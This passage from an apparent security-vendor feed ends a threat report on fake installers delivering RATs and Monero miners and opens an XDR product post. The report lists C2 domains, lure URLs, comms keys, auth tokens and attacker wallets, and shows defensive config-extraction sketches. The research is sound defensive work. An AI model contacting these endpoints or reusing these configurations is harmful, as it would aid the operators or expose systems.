<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image31.png" alt="Content at rapidfilesdatabaze[.]top/files/z872d515ea17b4e6c3abca9752c706242/" title="Content at rapidfilesdatabaze[.]top/files/z872d515ea17b4e6c3abca9752c706242/" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image23.png" alt="CPA content locker JS (3193171.js)" title="CPA content locker JS (3193171.js)" /></p>
<h3>Late 2023 Build</h3>
<p>An older sample, <code>6a01cc61f367d3bae34439f94ff3599fcccb66d05a8e000760626abb9886beac</code> (first seen 2023-11-09), presented a similar fake installer UI. This is the earliest activity we attributed to this threat actor, based on shared infrastructure and tooling.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image29.png" alt="Fake installer interface from late 2023" title="Fake installer interface from late 2023" /></p>
<p>This campaign build dropped PureRAT v0.3.8B, whose in-memory PE loader was a SmartAssembly-protected PureCrypter.</p>
<p>Extracted PureRAT config:</p>
<ul>
<li><code>wndlogon.hopto.org</code> (C2 #1)</li>
<li><code>wndlogon.itemdb.com</code> (C2 #2)</li>
<li><code>wndlogon.kozow.com</code> (C2 #3)</li>
<li><code>wndlogon.ydns.eu</code> (C2 #4)</li>
<li><code>Aesthetics135</code> (mutex and C2 comms key)</li>
<li><code>09.11.23</code> (build / campaign date)</li>
</ul>
<p>On the installation window, the “go here” hyperlink opens a short link <code>https://t[.]ly/MQXPm</code> that redirects to the lure page <code>https://softwaredlfast[.]top/files/n71fGbs2b7XceW3op71aQsrx41Rkeydl/</code>, which presents two fake outbound download links:</p>
<ul>
<li><code>https://rapidfilesbaze[.]top/z78fGbs2b7XceWop21aQsrx41Rkeydsktp/</code></li>
<li><code>https://rapidfilesbaze[.]top/z78fGbs2b7XceWop21aQsrx41Rkeymbl/</code></li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image27.png" alt="Content at https://softwaredlfast[.]top/files/n71fGbs2b7XceW3op71aQsrx41Rkeydl/" title="Content at https://softwaredlfast[.]top/files/n71fGbs2b7XceW3op71aQsrx41Rkeydl/" /></p>
<p>Both links were offline at the time of analysis. However, historical data indicates that <code>rapidfilesbaze[.]top</code> has been used consistently for CPA-style offer lures.</p>
<p>A <a href="http://URLScan.io">URLScan.io</a> archived response for a related path (<code>rapidfilesbaze[.]top/h74fGbs2b7XceWop71aQsrx41-Registration-Key-Mobile/</code>) confirms the site's use as a lure landing page.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image12.png" alt="Content at rapidfilesbaze[.]top/h74fGbs2b7XceWop71aQsrx41-Registration-Key-Mobile/" title="Content at rapidfilesbaze[.]top/h74fGbs2b7XceWop71aQsrx41-Registration-Key-Mobile/" /></p>
<p>The downstream unlocker site at <code>https://unlockcontent[.]net/cl/i/me9mn2</code> remains active as of this writing.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image37.png" alt="Content at https://unlockcontent[.]net/cl/i/me9mn2" title="Content at https://unlockcontent[.]net/cl/i/me9mn2" /></p>
<h2>GitHub Profiles</h2>
<p>Beyond the C2 infrastructure, the threat actor abuses GitHub as a payload delivery CDN, hosting staged binaries across two identified accounts. This technique shifts the download-and-execute step away from operator-controlled infrastructure to a trusted platform, making the traffic harder to flag or block. Both profiles were confirmed through decrypting C2 task traffic captured by VirusTotal sandboxes, which issued download-and-execute tasks pointing directly to raw GitHub content URLs. The operator routinely deletes individual binaries and entire repositories; the files documented below were captured via VirusTotal submissions or direct retrieval from GitHub prior to deletion.</p>
<p>The first profile, <code>https://github[.]com/lebnabar198</code>, surfaced during analysis of Campaign 2. After decrypting the C2 traffic from the <code>windirautoupdates[.]top</code> server, we observed the PureRAT implant being instructed to fetch a payload from this account, specifically the custom XMRig loader <code>MnrsInstllr_240126.exe</code>. This establishes a direct operational link between the PureRAT C2 and this GitHub profile.</p>
<p>The second profile, <code>https://github[.]com/ugurlutaha6116</code>, was identified by decrypting traffic from a PureRAT loader (SHA-256: <code>e1e87d11079d33ec1a1c25629cbb747e56fe17071bde5fd8c982461b5baa80a4</code>), which used the same PBKDF2 key derivation structure with the comms key <code>Aesthetics152</code>. The decrypted task pointed to the hosted payload <code>PM3107.exe</code>.</p>
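<p>To illustrate the derivation structure referenced above: PureRAT-style loaders derive their C2 session key from the configured comms string via PBKDF2. The salt, hash function, iteration count, and key length below are placeholders, not the sample's actual parameters, which must be recovered from the binary:</p>

```python
import hashlib

def derive_comms_key(comms_key: str, salt: bytes,
                     iterations: int = 10_000, length: int = 32) -> bytes:
    """Illustrative PBKDF2-HMAC-SHA1 derivation of a C2 session key.
    Every parameter besides the comms string is an assumption here."""
    return hashlib.pbkdf2_hmac(
        "sha1", comms_key.encode("utf-8"), salt, iterations, dklen=length
    )

# With the parameters recovered from the sample, the derived key is what
# decrypts the captured C2 task traffic.
```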
<p>The hosted files map to the following payloads:</p>
<table>
<thead>
<tr>
<th align="left">Filename</th>
<th align="left">Associated payload</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>CNB-v112-zUpdt-inPmnr.exe</code></td>
<td align="left">CNB Bot</td>
</tr>
<tr>
<td align="left"><code>MyXMRmnr_Instllr_0302.exe</code></td>
<td align="left">Custom XMRig loader</td>
</tr>
<tr>
<td align="left"><code>MnrsInstllr_240126.exe</code>, <code>MnrsInstllr_030126.exe</code></td>
<td align="left">Custom XMRig loader</td>
</tr>
<tr>
<td align="left"><code>PM2311.exe</code>, <code>PM1109.exe</code>, …</td>
<td align="left">PureMiner</td>
</tr>
<tr>
<td align="left"><code>Pmnr_1303_wALL.exe</code>, <code>Pmnr_Instllr_1303.exe</code>, …</td>
<td align="left">PureMiner</td>
</tr>
<tr>
<td align="left"><code>A_Instllr_250525.exe</code></td>
<td align="left">AsyncRAT</td>
</tr>
<tr>
<td align="left"><code>U_n_P_Installer_220725.exe</code>, <code>U_n_P_Installer_110725.exe</code>, …</td>
<td align="left">Loader for SilentCryptoMiner &amp; PureMiner</td>
</tr>
<tr>
<td align="left"><code>umnr_120525.exe</code>, <code>Umnr_1403_frPmnr.exe</code>, …</td>
<td align="left">SilentCryptoMiner</td>
</tr>
<tr>
<td align="left"><code>plsr_instllr_1804.exe</code></td>
<td align="left">Pulsar RAT</td>
</tr>
</tbody>
</table>
<h2>Monero Wallet Analysis</h2>
<p>During our analysis of the cryptominer payloads, we extracted four active Monero (XMR) wallet addresses from the malware's configuration. Because the threat actor routes compromised hosts through public mining pools, we can query the pools' public dashboards with these wallet addresses, which reveals the operational scale and profitability of the campaigns.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image30.png" alt="Tracking mining activity through a public dashboard" title="Tracking mining activity through a public dashboard" /></p>
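<p>Such dashboards are typically backed by public JSON endpoints. The sketch below assumes a supportxmr-style <code>/api/miner/&lt;address&gt;/stats</code> route and an <code>amtPaid</code> field reported in atomic units (1 XMR = 10<sup>12</sup> piconero); both the route and the field name are assumptions to verify against the specific pool:</p>

```python
import json
import urllib.request

ATOMIC_PER_XMR = 10**12  # Monero pools report amounts in piconero

def to_xmr(atomic: int) -> float:
    """Convert pool-reported atomic units to XMR."""
    return atomic / ATOMIC_PER_XMR

def fetch_wallet_stats(pool: str, wallet: str) -> dict:
    """Query a pool's public per-wallet stats endpoint (route shape assumed)."""
    with urllib.request.urlopen(f"{pool}/api/miner/{wallet}/stats") as resp:
        return json.load(resp)

# Usage against a live pool:
#   stats = fetch_wallet_stats("https://supportxmr.com", "<wallet address>")
#   print(to_xmr(stats["amtPaid"]))
```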
<p>Based on the telemetry available at the time of writing, here is the current status of the attacker's mining operations:</p>
<ul>
<li><strong>Wallet 1:</strong> <code>87NnUp8GKVBZ8pFV75Gas4A5nMMH7gEeo8AXBhm9Q6vS5oQ6SzCYf1bJr7Lib35VN2UX271PAXeqRFDmjo5SXm3zFDfDSWD</code>
<ul>
<li><strong>Active Workers:</strong> 7</li>
<li><strong>Estimated Hashrate Return:</strong> ~0.0172 XMR / day</li>
<li><strong>Total Paid Out:</strong> 2.2 XMR</li>
</ul>
</li>
<li><strong>Wallet 2:</strong> <code>89FYoLrfXwEDAVAsVYbhAfg3mATUtBzNAK2LG8wwDKfNTRhmNRTBn1VbwpFxEpJ8h5fQa2A4CS1tpRv7amUdJ3ZbUoVu6T1</code>
<ul>
<li><strong>Active Workers:</strong> 3</li>
<li><strong>Estimated Hashrate Return:</strong> ~0.02 XMR / day</li>
<li><strong>Total Paid Out:</strong> 4.23 XMR</li>
</ul>
</li>
<li><strong>Wallet 3:</strong> <code>89WoZKYoHhcNEFRV8jjB6nDqzjiBtQqyp4agGfyHwED1XyVAoknfVsvY1CwEHG6nwZFJGFTF5XbqC4tAQbnoFFCX8UQof3G</code>
<ul>
<li><strong>Active Workers:</strong> 2</li>
<li><strong>Estimated Hashrate Return:</strong> ~0.0057 XMR / day</li>
<li><strong>Total Paid Out:</strong> 11.69 XMR</li>
</ul>
</li>
<li><strong>Wallet 4:</strong><br />
<code>83Q1PKZ5yXsP8SCqjV3aV7B3UoBB3skPp49G1VnnGtv5Y5EUbFQTXvzR9cZshBYBBfd8Dm1snkkud431pdzEZ2uJTad1CiC</code>
<ul>
<li><strong>Active Workers:</strong> 2</li>
<li><strong>Estimated Hashrate Return:</strong> ~0.0036 XMR / day</li>
<li><strong>Total Paid Out:</strong> 9.76 XMR</li>
</ul>
</li>
</ul>
<p>With a combined total of 27.88 XMR (~USD $9,392 at the time of writing) already paid out to the attacker, these figures demonstrate that low-and-slow cryptojacking operations can yield consistent financial returns over time.</p>
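<p>The payout figures above can be tallied directly; the USD conversion below assumes a snapshot XMR price of roughly $337, an approximation rather than a quoted rate:</p>

```python
# Per-wallet totals paid out, as read from the public pool dashboards.
paid_out_xmr = {
    "wallet_1": 2.2,
    "wallet_2": 4.23,
    "wallet_3": 11.69,
    "wallet_4": 9.76,
}

total_xmr = sum(paid_out_xmr.values())
XMR_USD = 336.9          # assumed snapshot price, not a quoted rate
total_usd = total_xmr * XMR_USD
print(f"{total_xmr:.2f} XMR ~= ${total_usd:,.0f}")
```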
<h2>Agentic Payload and Configuration Extraction Pipeline</h2>
<p>In this research, we examined several hundred infection chains across the campaigns described above. Each chain comprises mostly .NET samples, either loaders or final payloads, layered with .NET Reactor obfuscation and often packed with Themida.</p>
<p>The large number of these chains makes manual configuration extraction and unpacking time-consuming and difficult to scale across all the chains we discovered. This is why, as part of this research, we used the Claude Opus 4.5 model to quickly vibecode a payload and configuration extraction pipeline. In this section, we provide details on the choices we made and the results we obtained with this method.</p>
<h4>Triage</h4>
<p>To optimize processing time, this phase focuses on extensively exploring infection chains using VirusTotal. We begin by obtaining a list of hashes from VirusTotal based on a specific pivot; for instance, we used the README.txt content as a pivot to identify other ISOs.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image39.png" alt="VirusTotal ISO pivot" title="VirusTotal ISO pivot" /></p>
<p>Claude is instructed to use a Python script to perform a recursive download. This process involves gathering information about embedded binaries and dropped files associated with each file hash. Claude then uses its “intelligence” to identify the next link in the chain and continues its investigation until it reaches what it considers the final binary in that chain. After exploring all chains, Claude analyzes the patterns and groups them into chain types. Finally, the results are compiled into a CSV file for subsequent analysis.</p>
<p>The data we obtained includes the starting hash from VirusTotal and the final hash, representing the last file Claude successfully tracked. This demonstrates that, with the right guidance, Claude can effectively track entire chains using only information from VirusTotal.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image6.png" alt="Triaged data" title="Triaged data" /></p>
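<p>The recursive walk can be sketched as below. The relationship names (<code>dropped_files</code>, <code>bundled_files</code>) follow the VirusTotal API v3 file-relationship endpoints, but the “first unseen child” heuristic is a simplification of letting the model pick the next link:</p>

```python
import json
import urllib.request

VT = "https://www.virustotal.com/api/v3"

def vt_related(api_key: str, sha256: str, relationship: str) -> list:
    """Fetch IDs related to a file via a VT API v3 relationship endpoint."""
    req = urllib.request.Request(
        f"{VT}/files/{sha256}/{relationship}?limit=10",
        headers={"x-apikey": api_key},
    )
    with urllib.request.urlopen(req) as resp:
        data = json.load(resp)
    return [item["id"] for item in data.get("data", [])]

def walk_chain(fetch, start: str,
               relationships=("dropped_files", "bundled_files"),
               max_depth: int = 5) -> list:
    """Greedily follow drop/bundle relationships from a starting hash.
    `fetch(sha256, relationship)` returns child hashes; pass a closure
    over vt_related for live use."""
    chain, current = [start], start
    for _ in range(max_depth):
        children = [h for rel in relationships for h in fetch(current, rel)]
        nxt = next((h for h in children if h not in chain), None)
        if nxt is None:
            break
        chain.append(nxt)
        current = nxt
    return chain

# Live usage:
#   walk_chain(lambda h, rel: vt_related(API_KEY, h, rel), start_hash)
```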
<h4>Download and Extraction</h4>
<p>Once the triage file was created, we downloaded the intermediate payloads and instructed Claude to start the automatic payload/configuration extraction process. To do this, we installed an OpenSSH server on a Windows virtual machine, then created a Claude skill containing instructions to connect to this machine and use the installed tools to perform the reverse engineering and extraction workflow.</p>
<p>The workflow is simple: Claude connects to the machine, uploads the sample, uses Detect It Easy to determine whether it is obfuscated or packed, and applies the appropriate deobfuscation tool (Unlicense, .NET Reactor Slayer) until the sample is no longer obfuscated. It then runs the developed extraction scripts to identify the sample and determine the next step: either continue extraction with the child payload if the parent is a loader, or store the configuration information for the final report.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image19.png" alt="Payload/Configuration extraction Claude skill" title="Payload/Configuration extraction Claude skill" /></p>
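<p>The core of that loop, reduced to a sketch; the tool invocations and the Detect It Easy report parsing are simplified assumptions rather than the skill's actual commands:</p>

```python
import subprocess

# Protector substring (as it appears in a Detect It Easy report) mapped
# to the tool that strips it. Tool names are illustrative placements of
# the tools named above (.NET Reactor Slayer, Unlicense).
DEOBFUSCATORS = {
    ".net reactor": "NETReactorSlayer.CLI",
    "themida": "unlicense",
}

def detect_protector(sample_path: str) -> str:
    """Return the Detect It Easy console report for a sample."""
    return subprocess.run(["diec", sample_path],
                          capture_output=True, text=True).stdout

def pick_tool(die_report: str):
    """Map a DiE report to the next deobfuscation tool, or None if clean."""
    report = die_report.lower()
    for marker, tool in DEOBFUSCATORS.items():
        if marker in report:
            return tool
    return None
```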
<p>If all the extraction scripts fail, Claude must enter Research Mode. This mode is the most enjoyable part of the skill because it gives Claude a workflow to either automatically develop a new extraction script or identify why the existing script doesn't work with the variant. Research Mode uses the <a href="https://github.com/dnSpyEx">dnSpyEx</a> tool installed on the machine to decompile the sample to C#, performs a complete code analysis to identify how to extract the payload or configuration, develops a script from that knowledge that works directly with the raw binaries for efficiency, and finally stores the knowledge for the next time it encounters the same malware family.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image28.png" alt="Research mode instruction" title="Research mode instruction" /></p>
<h4>Results</h4>
<p>Using the Claude Opus 4.5 model, the results were impressive. Not only did Claude succeed in handling the obfuscation layers, but it also researched and developed, entirely on its own, the methods and scripts (based on the CIL of .NET binaries) to extract the final payloads and their configurations without having encountered them before.</p>
<p>It also demonstrated robust failure handling without requiring additional instruction. For example, when it encountered samples that could not be fully deobfuscated due to issues with Reactor Slayer, which made static extraction too difficult, it stopped processing, documented the problem, and proceeded to the next sample.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image9.png" alt="Claude entering Research Mode on extraction failure" title="Claude entering Research Mode on extraction failure" /></p>
<p>Of course, it is not without drawbacks:</p>
<ul>
<li>Once its context filled up, it often diverged onto unproductive paths and required either micro-management or a reset; hence the value of a skill with reusable instructions and a knowledge base of work already done.</li>
<li>It is slow, since every action requires the model to “think”; however, the process is automatic, so that time is recovered for other work.</li>
<li>Its token consumption is high, particularly because it often takes inefficient paths.</li>
</ul>
<h2>Observations</h2>
<p>The following tables consolidate malware configurations extracted across the builds we investigated, and are not exhaustive:</p>
<p><strong>CNB Bot</strong></p>
<table>
<thead>
<tr>
<th align="left">Versions</th>
<th align="left"><code>1.1.1.</code>, <code>1.1.2.</code>, <code>1.1.3.</code>, <code>1.1.5.</code>, <code>1.1.6.</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s:</td>
<td align="left"><code>tabbysbakescodes[.]ws/CNB/gate.php</code><br /><code>tommysbakescodes[.]ws/CNB/gate.php</code><br /><code>tommysbakescodes[.]cv/CNB/gate.php</code><br /><code>win64autoupdates[.]top/CNB/gate.php</code><br /><code>autoupdatewinsystem[.]top/CNB/gate.php</code></td>
</tr>
<tr>
<td align="left">Campaign/Build ID</td>
<td align="left"><code>03_26</code>, <code>25_02_26</code>, <code>15_02_26</code>, <code>1502_26</code>, <code>0502_26</code>, <code>01-26</code>, <code>frPmnr_0126</code></td>
</tr>
<tr>
<td align="left">Auth tokens</td>
<td align="left"><code>0326GJSECMHSHOEYHQMKDZ</code>, <code>020226SNDLPXSHTCSURVQ</code>, <code>0226frBLKWNYHD0FS1YWE</code>, <code>0126HRAOLQEFNGGRCXMITREQC</code></td>
</tr>
<tr>
<td align="left">Mutex</td>
<td align="left"><code>MTXCNBV11000ERCXSWOLZNBVRGH</code></td>
</tr>
</tbody>
</table>
<p><strong>PureRAT</strong></p>
<table>
<thead>
<tr>
<th align="left">Versions</th>
<th align="left"><code>0.3.8B</code>, <code>0.3.9</code>, <code>0.4.1</code>, <code>3.0.1</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s</td>
<td align="left"><code>windirautoupdates[.]top</code><br /><code>winautordr.hopto[.]org</code><br /><code>winautordr.itemdb[.]com</code><br /><code>winautordr.ydns[.]eu</code><br /><code>winautordr.kozow[.]com</code><br /><code>wndlogon.hopto[.]org</code><br /><code>wndlogon.itemdb[.]com</code><br /><code>wndlogon.kozow[.]com</code><br /><code>wndlogon.ydns[.]eu</code></td>
</tr>
<tr>
<td align="left">Campaign/Build IDs</td>
<td align="left"><code>23-01-26</code>, <code>14-01-26</code>, <code>03-01-26</code>, <code>24-12-25</code>, <code>25-11-25</code>, <code>08-11-25</code>, <code>29-01-25</code>, <code>09.11.23</code></td>
</tr>
<tr>
<td align="left">Mutex / C2 Comms key</td>
<td align="left"><code>Aesthetics135</code></td>
</tr>
</tbody>
</table>
<p><strong>PureMiner</strong></p>
<table>
<thead>
<tr>
<th align="left">Versions</th>
<th align="left"><code>7.0.6</code>, <code>7.0.7</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s</td>
<td align="left"><code>wndlogon.hopto[.]org</code><br /><code>wndlogon.itemdb[.]com</code><br /><code>wndlogon.ydns[.]eu</code><br /><code>wndlogon.kozow[.]com</code></td>
</tr>
<tr>
<td align="left">Campaign/Build IDs</td>
<td align="left"><code>24-10-25</code>, <code>23-11-25</code>, <code>15-09-25-MassUpdt</code>, <code>11-09-25</code>, <code>08-08-RAM</code>, <code>06-08-RAM</code>, <code>04-08-RAM</code>, <code>31-07-RAM</code>, <code>03-08-RAM</code>, <code>13-03-25</code>, <code>25-07-RAMwALL</code>, <code>25-11-25</code></td>
</tr>
<tr>
<td align="left">Wallet Address</td>
<td align="left"><code>89WoZKYoHhcNEFRV8jjB6nDqzjiBtQqyp4agGfyHwED1XyVAoknfVsvY1CwEHG6nwZFJGFTF5XbqC4tAQbnoFFCX8UQof3G</code></td>
</tr>
<tr>
<td align="left">Mutex / C2 Comms key</td>
<td align="left"><code>4c271ad41ea2f6a44ce8d0</code></td>
</tr>
</tbody>
</table>
<p><strong>Custom XMRig Loader</strong></p>
<table>
<thead>
<tr>
<th align="left">Wallet Addresses</th>
<th align="left"><code>87NnUp8GKVBZ8pFV75Gas4A5nMMH7gEeo8AXBhm9Q6vS5oQ6SzCYf1bJr7Lib35VN2UX271PAXeqRFDmjo5SXm3zFDfDSWD</code>, <code>83sDbPzoghAX45hA2Y26xvaDsKv8TLymAGKKyZwrCKB3T9kuuYBDzb64vfy9XQyrpUFQ4r8u3V2T1EzqE6CR27XmMCCwGu1</code></th>
</tr>
</thead>
</table>
<p><strong>AsyncRAT</strong></p>
<table>
<thead>
<tr>
<th align="left">Versions</th>
<th align="left"><code>0.5.8</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s</td>
<td align="left"><code>wndlogon.hopto[.]org</code><br /><code>wndlogon.itemdb[.]com</code><br /><code>wndlogon.ydns[.]eu</code><br /><code>wndlogon.kozow[.]com</code></td>
</tr>
<tr>
<td align="left">Campaign/Build IDs</td>
<td align="left"><code>BL_Bckp_250525</code></td>
</tr>
</tbody>
</table>
<p><strong>PulsarRAT</strong></p>
<table>
<thead>
<tr>
<th align="left">Versions</th>
<th align="left"><code>1.5.1</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s</td>
<td align="left"><code>wndlogon.hopto[.]org</code><br /><code>wndlogon.itemdb[.]com</code><br /><code>wndlogon.ydns[.]eu</code><br /><code>wndlogon.kozow[.]com</code></td>
</tr>
<tr>
<td align="left">Campaign/Build IDs</td>
<td align="left"><code>18-04-25</code></td>
</tr>
</tbody>
</table>
<p><strong>SilentCryptoMiner</strong></p>
<table>
<thead>
<tr>
<th align="left">Mining Pool</th>
<th align="left"><code>gulf.moneroocean[.]stream:10128</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Wallet</td>
<td align="left"><code>83Q1PKZ5yXsP8SCqjV3aV7B3UoBB3skPp49G1VnnGtv5Y5EUbFQTXvzR9cZshBYBBfd8Dm1snkkud431pdzEZ2uJTad1CiC</code></td>
</tr>
<tr>
<td align="left">Password</td>
<td align="left"><code>CPUrig</code></td>
</tr>
<tr>
<td align="left">Mining proxy/fallback</td>
<td align="left"><code>172.94.15[.]211:5443</code></td>
</tr>
<tr>
<td align="left">Domain</td>
<td align="left"><code>softappsbase[.]top</code></td>
</tr>
<tr>
<td align="left">Domain</td>
<td align="left"><code>autoupdatewinsystem[.]top</code></td>
</tr>
<tr>
<td align="left">Domain</td>
<td align="left"><code>softwaredatabase[.]xyz</code></td>
</tr>
<tr>
<td align="left">Configuration path</td>
<td align="left"><code>https://softappsbase[.]top/UnammnrsettingsCPU.txt</code></td>
</tr>
<tr>
<td align="left">Configuration path</td>
<td align="left"><code>https://autoupdatewinsystem[.]top/UWP1/cpu.txt</code></td>
</tr>
<tr>
<td align="left">Configuration path</td>
<td align="left"><code>https://softwaredatabase[.]xyz/UnammnrsettingsCPU.txt</code></td>
</tr>
<tr>
<td align="left">Communication endpoint</td>
<td align="left"><code>https://softappsbase[.]top/UnamWebPanel7/api/endpoint.php</code></td>
</tr>
<tr>
<td align="left">Communication endpoint</td>
<td align="left"><code>https://autoupdatewinsystem[.]top/UWP1/api/endpoint.php</code></td>
</tr>
<tr>
<td align="left">Communication endpoint</td>
<td align="left"><code>https://softwaredatabase[.]xyz/UnamWebPanel7/api/endpoint.php</code></td>
</tr>
</tbody>
</table>
<p>Here is a <a href="https://gist.github.com/jiayuchann/6728db5acef7b2793a6afa77b600c7c6">GitHub Gist</a> of a list of sample hashes.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/fake-installers-to-monero.jpg" length="0" type="image/jpeg"/>
        </item>
        <item>
            <title><![CDATA[Investigating from the Endpoint Across Your Environment with Elastic Security XDR]]></title>
            <link>https://www.elastic.co/kr/security-labs/investigating-from-the-endpoint-across-your-environment</link>
            <guid>investigating-from-the-endpoint-across-your-environment</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This article highlights how Elastic Security XDR unifies endpoint protection with multi-domain security analytics to help analysts trace and contain multi-stage attacks across hybrid and cloud environments.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>Security investigations rarely stay confined to a single host. Today’s attackers increasingly use automation and AI to compress multi-stage attacks, turning what once unfolded over days into coordinated activity across endpoints, identities, workloads, and cloud services within minutes.</p>
<p>While many attacks begin on an endpoint, investigators must quickly determine how that activity spreads across the environment. In many environments, per-endpoint licensing limits how broadly protection and telemetry can be deployed, creating protection gaps during these investigations.</p>
<p>Elastic Security XDR is built around that reality. It includes best-in-class endpoint protection, without per-endpoint licensing constraints, in an agentic security operations platform where endpoint telemetry, infrastructure signals, and supporting artifacts can be analyzed together.</p>
<p>This post explores how Elastic Security XDR supports investigations across endpoints, workloads, and the broader environment, highlighting tools and workflows that help analysts collect evidence, pivot across telemetry, and respond efficiently.</p>
<h2>Endpoint at the heart of XDR</h2>
<p>The <a href="https://www.elastic.co/kr/resources/security/report/global-threat-report">2025 Elastic Global Threat Report</a> reveals that with 90% of malware targeting Windows, and browsers acting as the 'primary battleground', host-level visibility is essential to stopping a breach before it scales to the cloud. Elastic Defend, Elastic Security’s native endpoint protection, powers XDR from the endpoint outward. It not only prevents threats across Windows, macOS, and Linux, but also generates rich, investigation-grade telemetry that gives analysts the context they need to understand what happened on a host.</p>
<p>As activity occurs, Elastic Defend captures system events including process execution, file changes, network connections, and related artifacts. This telemetry forms the foundation for broader investigations, allowing analysts to correlate endpoint behavior with activity across workloads, identities, and other systems.</p>
<p>Multiple detection layers protect against malware, ransomware, fileless techniques, and other malicious behaviors, using both static and behavioral analysis. Independent validation from the <a href="https://www.elastic.co/kr/blog/av-comparatives-business-security-test-2025">AV-Comparatives Business Security Test</a> confirms Elastic’s effectiveness; in the 2025 test cycle, Elastic Security was the only vendor that blocked every tested threat, earning perfect scores in both Real-World Protection and Malware Protection.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image2.png" alt="" /></p>
<p>Elastic also takes a principled approach to openness. Unlike many endpoint security tools that operate as a black box, Elastic publishes detection and prevention logic in an <a href="https://github.com/elastic/protections-artifacts">open repository</a>. This transparency lets analysts understand how protections work, validate them in their own environments, and prioritize high-risk gaps. By empowering users with visibility and insight, Elastic ensures security teams can act with confidence and maximize the value of their investigations.</p>
<h2>Beyond the endpoint: expanding the investigation</h2>
<p>Attacks rarely stay confined to a single host. Credentials may be compromised, workloads modified, or activity spread across cloud services and infrastructure. To fully understand an incident, analysts need to correlate endpoint activity with signals from the broader environment.</p>
<p>Elastic Security XDR enables this by bringing multiple data sources into the same analysis environment through <a href="https://www.elastic.co/kr/integrations/data-integrations?solution=all-solutions&amp;category=security">hundreds of integrations</a> with popular security tools and data sources. Endpoint telemetry, whether collected by Elastic Defend or another EDR platform, can be analyzed alongside cloud activity, identity events, network telemetry, and third-party logs, without forcing organizations into a closed security stack. Elastic provides the <a href="https://www.elastic.co/kr/docs/reference/ecs">common schema</a> and unified detection engine required to normalize disparate signals, allowing analysts to bypass manual data mapping and immediately pivot between sources to follow how activity moves across users, systems, and infrastructure.</p>
<p>Centralized <a href="https://elastic.github.io/detection-rules-explorer/">detection rules</a> operate across the unified dataset in the security platform, complementing <a href="https://github.com/elastic/protections-artifacts">real-time protections</a> that run directly on the endpoint. They enable alerts to reflect correlated activity across multiple domains. Suspicious process activity on a host can be matched with identity events, cloud API calls, or network behavior, helping analysts determine whether an event is isolated or part of a larger attack chain.</p>
<p>Container workloads highlight another way XDR extends investigations. <a href="https://www.elastic.co/kr/security-labs/getting-started-with-defend-for-containers">Elastic Defend for Containers</a> monitors runtime behavior inside containerized environments, detecting suspicious activity such as unexpected process execution, privilege escalation, or access to sensitive resources. By connecting endpoint behavior to the broader environment, Elastic Security XDR gives analysts the visibility needed to scope incidents accurately, prioritize critical threats, and respond with confidence.</p>
<h2>Reconstructing the attack path</h2>
<p>After relevant telemetry is collected, analysts need to piece together what happened and how the attack progressed. Investigations involve pivoting between events, validating hypotheses, and assembling a complete timeline of activity across the environment.</p>
<p>Elastic Security XDR provides <a href="https://www.elastic.co/kr/docs/solutions/security/investigate">investigation tools</a> designed to support this process. Visual Event Analyzer, Session View, and Timeline allow analysts to explore relationships between events, trace execution chains, and correlate activity across datasets while maintaining investigative context.</p>
<p>Visual Event Analyzer offers a graphical view of process relationships, helping analysts spot suspicious parent-child behavior and understand execution flows. Session View reconstructs activity within a process session, showing commands, network connections, and other actions as they unfolded. Timeline acts as an investigative workspace where analysts collect and correlate events from multiple sources, refine queries, and build a coherent attack narrative.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image5.png" alt="Investigate alerts &amp; processes with Event Analyzer" title="Investigate alerts &amp; processes with Event Analyzer" /></p>
<p>Together, these tools help analysts validate hypotheses faster, deepen analysis, and enable more confident response decisions.</p>
<h2>Agentic investigation: discovery, summarization, and natural language querying</h2>
<p>Elastic Security’s AI-driven investigative workflows help analysts keep pace with modern attacks by accelerating investigation and surfacing connected activity across the environment. Attack Discovery identifies connected alerts across endpoints, workloads, cloud services, and integrated third-party data, helping analysts uncover hidden attack chains without manually correlating events.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image6.png" alt="Attack Discovery detects and summarizes attack activity against the MITRE Attack Chain." title="Attack Discovery detects and summarizes attack activity against the MITRE Attack Chain." /></p>
<p>Once an investigation is underway, Elastic AI Assistant and Agent Builder enable natural-language workflows that let analysts interact with data and automation more efficiently. Analysts can summarize observations, ask questions about entities and activity, and move seamlessly from supporting signals to containment or remediation actions. With the introduction of <a href="https://www.elastic.co/kr/security-labs/agent-skills-elastic-security">agent skills</a>, teams can now extend these workflows with reusable, task-specific capabilities, such as alert triage, rule management, and case handling, allowing the assistant to execute complex, multi-step security tasks with the same consistency and repeatability as traditional automation, but through a conversational interface.</p>
<p>In practice, these capabilities reduce the time from an initial alert to full incident understanding, allowing SOC teams to respond faster, focus on high-priority threats, and act with confidence.</p>
